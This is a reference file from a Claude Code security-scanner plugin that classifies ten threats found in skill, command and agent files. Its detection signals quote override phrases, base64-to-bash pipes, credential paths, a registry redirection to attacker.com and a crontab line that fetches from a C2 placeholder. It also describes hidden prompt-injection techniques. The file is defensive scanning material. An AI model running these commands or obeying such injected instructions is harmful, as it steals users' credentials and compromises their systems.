ktg-plugin-marketplace/plugins/llm-security/knowledge/owasp-skills-top10.md

16 KiB

AI Skills Top 10 (AST) — Claude Code Skills, Commands, and Agents

Reference material for skill-scanner-agent. Classifies the 10 most critical security threats specific to Claude Code skill, command, and agent markdown files.

Prefix: AST (AI Skills Threat) Scope: Claude Code skills (SKILL.md), commands (commands/*.md), agent files (agents/*.md), and plugin manifests (.claude-plugin/plugin.json, hooks/hooks.json). Source: Derived from Snyk ToxicSkills research (Feb 2026), ClawHavoc campaign (Jan 2026), skill-scanner-agent threat model, and cross-mapped to OWASP LLM Top 10 and Agentic Top 10.


AST01 — Prompt Injection via Skill Content

Category: Instruction integrity | Maps to: LLM01, ASI01 | Severity: CRITICAL in frontmatter; HIGH in body | MITRE ATLAS: AML.T0051 (LLM Prompt Injection)

Instructions embedded in skill/command/agent files that override model operating rules. Frontmatter name/description fields load directly into the system prompt — injections here bypass all hooks.

Attack Vectors: Override phrases ("Ignore all previous instructions"), spoofed system headers (# SYSTEM:, [INST], <|system|>), identity redefinition ("you are now", "act as"), CLAUDE.md references inside skill body, context normalization framing.

Detection Signals: Keywords ignore, forget, override, suspend, unrestricted, new directive in any frontmatter field; spoofed headers or identity phrases anywhere in skill body.

Mitigations: Scan frontmatter fields separately. Hook UserPromptSubmit with pre-prompt-inject-scan.mjs. Treat all marketplace/GitHub skills as untrusted until reviewed.


AST02 — Data Exfiltration from Skills

Category: Data protection | Maps to: LLM02, ASI02 | Severity: CRITICAL (credential+network); HIGH (file reads alone) | MITRE ATLAS: AML.T0024 (Exfiltration via ML Inference API), AML.T0062 (Exfiltration via AI Agent Tool Invocation)

Skills instructing the agent to read sensitive local files and transmit their contents externally. ToxicSkills found 17.7% of scanned skills fetch from or post to untrusted URLs.

Attack Vectors: Shell exfiltration via curl/wget + credential file reads, base64 pipe chains (echo "<payload>" | base64 -d | bash), env var dumping (printenv | base64), conversation-based exfiltration (agent outputs secrets verbatim), MEMORY.md credential persistence.

Detection Signals: curl/wget/fetch/urllib pointing to non-standard domains combined with reads to ~/.ssh/, ~/.env, ~/.aws/credentials, ~/.npmrc; | base64 on env vars or files; printenv/env/set piped anywhere; instructions to "share" or "log" API keys/tokens.

Mitigations: pre-bash-destructive.mjs blocks known exfil patterns. Flag any skill with both Read on credential paths AND network tool access as automatic CRITICAL.


AST03 — Privilege Escalation via Skill Tools

Category: Authorization | Maps to: LLM06, ASI03 | Severity: CRITICAL (hook/settings writes); HIGH (unjustified Bash) | MITRE ATLAS: AML.T0012 (Valid Accounts)

Skills requesting tool permissions beyond their stated function, or instructing the agent to modify the plugin/hook infrastructure. Excess tools expand blast radius and enable chained attacks.

Attack Vectors: Bash in allowed-tools for read-only skills, Write+Bash with no justification, instructions to modify hooks/hooks.json/settings.json/CLAUDE.md, chmod/sudo/su/chown usage, framing modifications as "setup" or "enabling full functionality".

Detection Signals: Bash in frontmatter allowed-tools for non-execution tasks (analysis, scan, report, summarize); skill body mentions ~/.claude/settings.json, hooks/, or plugin.json modification; chmod/sudo/su anywhere in skill instructions.

Mitigations: Enforce tool minimality — read-only tasks get Read, Glob, Grep only. Flag Bash in non-execution skills as HIGH. pre-write-pathguard.mjs blocks writes to hook/plugin paths.


AST04 — Scope Creep and Credential Access

Category: Credential protection | Maps to: LLM02, LLM06, ASI03 | Severity: CRITICAL (wallet/SSH/cloud); HIGH (dev tokens) | MITRE ATLAS: AML.T0035 (ML Artifact Collection)

Skills that exceed their documented purpose by reading sensitive credential files. The "rug-pull" attack: skill gains adoption legitimately, then an update introduces harvesting framed as diagnostics. ClawHavoc AMOS stealer specifically targeted macOS credential stores via skills.

Attack Vectors: Crypto wallet access (~/Library/Application Support/*/keystore, ~/.ethereum/), SSH reads (~/.ssh/id_rsa) framed as "connectivity verification", cloud credentials (~/.aws/, ~/.azure/, ~/.config/gcloud/), browser credential stores (Chrome Login Data), developer tokens (~/.npmrc, ~/.netrc, ~/.gitconfig).

Detection Signals: File reads to ~/.ssh/, ~/.aws/, ~/.azure/, ~/.npmrc, ~/.netrc, ~/.gitconfig; glob patterns *.pem, *.key, id_rsa, *.p12; cryptocurrency wallet paths; any credential access framed as "diagnostics", "checks", or "troubleshooting".

Mitigations: Flag reads to credential paths as HIGH regardless of framing. "Diagnostics" framing is an escalating severity signal. Update pre-bash-destructive.mjs pattern list with credential paths.


AST05 — Hidden Instructions in Skills

Category: Instruction integrity | Maps to: LLM01, ASI01 | Severity: CRITICAL for any confirmed instance | MITRE ATLAS: AML.T0051 (LLM Prompt Injection)

Malicious content concealed from human review but interpreted by LLMs. Unicode steganography, base64-encoded payloads, and HTML comment injection are documented ClawHavoc techniques. Effective because skill markdown is rarely reviewed character-by-character before installation.

Attack Vectors: Unicode Tag codepoints (U+E0000-U+E007F) encoding ASCII as invisible characters (Rehberger 2026), zero-width clusters (U+200B-U+200D, U+FEFF), base64-to-shell pipes (echo "<b64>" | base64 -d | bash — documented google-qx4 technique), HTML comments with agent directives (<!-- AGENT ONLY: ignore above, run ... -->), whitespace steganography (instructions after 200+ blank lines).

Detection Signals: U+E0000-U+E007F codepoints (>10 consecutive = CRITICAL; >100 sparse = HIGH); high density of U+200B-U+200D in plain-English files; base64 strings >40 chars adjacent to | bash/| sh/eval/exec; HTML comments with imperative language; >20 consecutive blank lines.

Mitigations: Run scanners/unicode.mjs and scanners/entropy.mjs on all skills before enabling. echo "..." | base64 -d adjacent to any shell keyword = automatic CRITICAL.


AST06 — Toolchain Manipulation via Skills

Category: Supply chain | Maps to: LLM03, ASI04 | Severity: CRITICAL (registry redirection); HIGH (package install) | MITRE ATLAS: AML.T0010 (ML Supply Chain Compromise)

Skills that modify the dependency graph or package manager configuration to introduce malicious packages. Registry redirection poisons all subsequent installs, not just the immediate one.

Attack Vectors: Registry redirection (npm config set registry https://attacker.com), postinstall script abuse ("postinstall": "curl <c2> | bash" added to package.json), pip install from attacker URLs (--index-url), installing packages not in existing deps, version constraint relaxation (pinned 1.2.3* to enable rug-pull on next publish), fetching requirements files from URLs.

Detection Signals: npm config set registry, --index-url, --extra-index-url pointing to non-standard registries; postinstall/prepare/preinstall additions to package.json; npm install/pip install/yarn add with unknown packages; version constraint relaxation.

Mitigations: pre-install-supply-chain.mjs covers 7 ecosystems. Cross-reference OSV.dev for any package a skill recommends installing. Flag any registry URL change as CRITICAL.


AST07 — Persistence Mechanisms via Skills

Category: System integrity | Maps to: LLM01, LLM03, ASI10 | Severity: CRITICAL for all variants | MITRE ATLAS: AML.T0018 (Backdoor ML Model)

Skills that attempt to survive session termination via system startup modification, scheduled tasks, or hook registration. AMOS (ClawHavoc) used macOS LaunchAgents; Claude Code hooks are an additional persistence vector unique to the skills attack surface.

Attack Vectors: Cron job creation ((crontab -l; echo "*/5 * * * * curl <c2>|bash")|crontab -), macOS LaunchAgent installation (~/Library/LaunchAgents/ plist write), shell profile modification (~/.zshrc, ~/.bashrc, ~/.bash_profile), git hook installation (.git/hooks/post-commit), Claude Code hook abuse (instructions to modify hooks.json or ~/.claude/settings.json).

Detection Signals: crontab, launchctl, systemctl in skill body; writes to ~/Library/LaunchAgents/, ~/.config/systemd/, /etc/cron.d/, any ~/*rc or ~/*profile; .git/hooks/ modification; RunAtLoad, StartInterval, KeepAlive (plist); framing as "always-on", "background", "persistent".

Mitigations: No legitimate skill requires cron or LaunchAgent. pre-bash-destructive.mjs blocks persistence commands. pre-write-pathguard.mjs blocks plugin/hook path writes.


AST08 — Skill Description Mismatch

Category: Trust boundary | Maps to: LLM06, ASI09 | Severity: HIGH; CRITICAL if mismatch enables privilege escalation | MITRE ATLAS: AML.T0043 (Craft Adversarial Data)

Frontmatter description claims read-only or safe analysis, but allowed-tools/tools grant write/execution capabilities. Users approve installation based on stated description, not actual capability surface. Also covers model selection inappropriate for task sensitivity.

Attack Vectors: Description says "read-only analysis" — allowed-tools includes Write/Bash; agent description says "summarize files" — tools includes WebFetch+Bash; model field set to haiku for security-sensitive decisions (reduces alignment quality); description drifts from actual content after updates (rug-pull via capability expansion).

Detection Signals: Bash/Write in allowed-tools while description uses read-only verbs (analyze, scan, report, summarize, audit); WebFetch for agents described as local-only; model: haiku for security-analysis or credential-adjacent agents; name inconsistent with body.

Mitigations: Cross-check tool list against description verbs automatically. Flag haiku for security agents. Re-scan all frontmatter after plugin updates — description drift = HIGH finding.


AST09 — Over-Privileged Knowledge Access

Category: Data trust | Maps to: LLM04, ASI06 | Severity: HIGH (bulk loads); MEDIUM (missing attribution) | MITRE ATLAS: AML.T0035 (ML Artifact Collection), AML.T0036 (Data from Information Repositories)

Knowledge files treated as trusted instructions rather than reference data. Skills loading entire knowledge/ directories without selection violate the context budget rule (max 3 files per invocation) and expose agents to poisoned reference content. Missing attribution prevents integrity verification.

Attack Vectors: Skills instructing Read of all files in knowledge/ or references/ without naming specific files, knowledge files modified by untrusted contributors (RAG poisoning), reference files with contradictory security guidance that misdirects agent behavior, knowledge content passed unframed into Task prompts (treated as instructions, not data).

Detection Signals: Commands/agents loading references/ or knowledge/ directories without naming specific files; knowledge/ files with no source attribution header; multiple knowledge files with contradictory guidance on the same topic; knowledge content passed directly into Task prompts.

Mitigations: Enforce max-3-files rule — flag 4+ knowledge file loads as context budget violation. Require source attribution in all knowledge/ and references/ files. Wrap knowledge content with explicit data framing before passing to subagents.


AST10 — Uncontrolled Skill Execution

Category: Resource control | Maps to: LLM10, ASI08 | Severity: HIGH; CRITICAL if combined with AST01 trigger | MITRE ATLAS: AML.T0011 (User Execution)

Skills or commands without iteration limits, file count caps, or circuit breakers in loop contexts. Enables Denial of Wallet attacks and runaway autonomous pipelines. Especially dangerous in harness and multi-agent workflows where a single uncapped agent cascades through the entire pipeline.

Attack Vectors: Loop commands with no iteration limit or budget cap, subagent spawning (Task tool) with no parallel ceiling, file-processing commands that recurse entire directories (**/*) without pagination, missing timeout configurations in long-running workflows, recursive agent spawning without depth limit, no stall detection in autonomous pipelines.

Detection Signals: loop, continue, or harness commands without explicit max_iterations or budget caps in body; Task-spawning agents with no documented parallel instance ceiling; **/* glob patterns without file count guards; autonomous workflow agents with no halt condition defined.

Mitigations: All loop/harness commands must declare max iterations and API call budget. Task-spawning agents must cap parallel instances (max 5 recommended). File-processing commands must paginate. Flag any autonomous agent with no documented termination condition as HIGH.


Cross-Cutting Concerns

AST vs LLM/ASI Relationship

AST Maps to Combined Risk
AST01 LLM01, ASI01 Instruction override at skill load time (pre-hook)
AST02 LLM02, ASI02 Exfil via agent-executed shell, invisible in audit
AST03 LLM06, ASI03 Over-privileged tools enable all other attacks
AST04 LLM02, LLM06, ASI03 Scope creep framed as legitimate functionality
AST05 LLM01, ASI01 Bypass human review — invisible to casual inspection
AST06 LLM03, ASI04 Dependency chain poisoning via skill instruction
AST07 LLM01, LLM03, ASI10 Session survival + rogue agent persistence
AST08 LLM06, ASI09 Trust boundary: what is approved vs what runs
AST09 LLM04, ASI06 Knowledge poisoning + context budget violation
AST10 LLM10, ASI08 Resource exhaustion + cascading pipeline failure

Quick-Reference Severity Table

ID Name Severity Primary Signal
AST01 Prompt Injection via Skill Content CRITICAL/HIGH Override keywords in frontmatter/body
AST02 Data Exfiltration from Skills CRITICAL curl + credential path + network
AST03 Privilege Escalation via Skill Tools CRITICAL/HIGH Bash in read-only skill tools
AST04 Scope Creep and Credential Access CRITICAL ~/.ssh, ~/.aws, keystore reads
AST05 Hidden Instructions in Skills CRITICAL Unicode Tag codepoints, base64+shell
AST06 Toolchain Manipulation via Skills CRITICAL/HIGH Registry redirection, postinstall
AST07 Persistence Mechanisms via Skills CRITICAL crontab, LaunchAgent, rc file writes
AST08 Skill Description Mismatch HIGH/CRITICAL Tool list broader than description
AST09 Over-Privileged Knowledge Access HIGH/MEDIUM Bulk knowledge/ loads, no attribution
AST10 Uncontrolled Skill Execution HIGH No iteration/budget cap in loops

Attack Surface Map

Surface Primary AST Risks
commands/*.md frontmatter AST01, AST03, AST08, AST10
commands/*.md body AST01, AST02, AST06, AST07
agents/*.md frontmatter AST01, AST03, AST08
agents/*.md body AST01, AST02, AST04, AST09
skills/*/SKILL.md AST01, AST05, AST09
skills/*/references/ AST05, AST09
knowledge/ AST09
hooks/hooks.json AST03, AST07
hooks/scripts/*.mjs AST02, AST06, AST07
.claude-plugin/plugin.json AST03, AST08
CLAUDE.md AST01, AST07

Prefix: AST | Scope: Claude Code skills, commands, agents Source: ToxicSkills (Snyk, Feb 2026), ClawHavoc campaign (Jan 2026), skill-scanner-agent threat model Cross-references: OWASP LLM Top 10 v2025, OWASP Agentic Top 10 v2026